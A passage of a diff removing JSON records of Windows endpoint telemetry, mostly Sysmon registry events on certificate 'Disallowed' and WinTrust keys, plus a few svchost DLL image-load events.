"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "policymanager.dll", - "image_path": "C:\\Windows\\System32\\policymanager.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877930000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp110_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877930000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 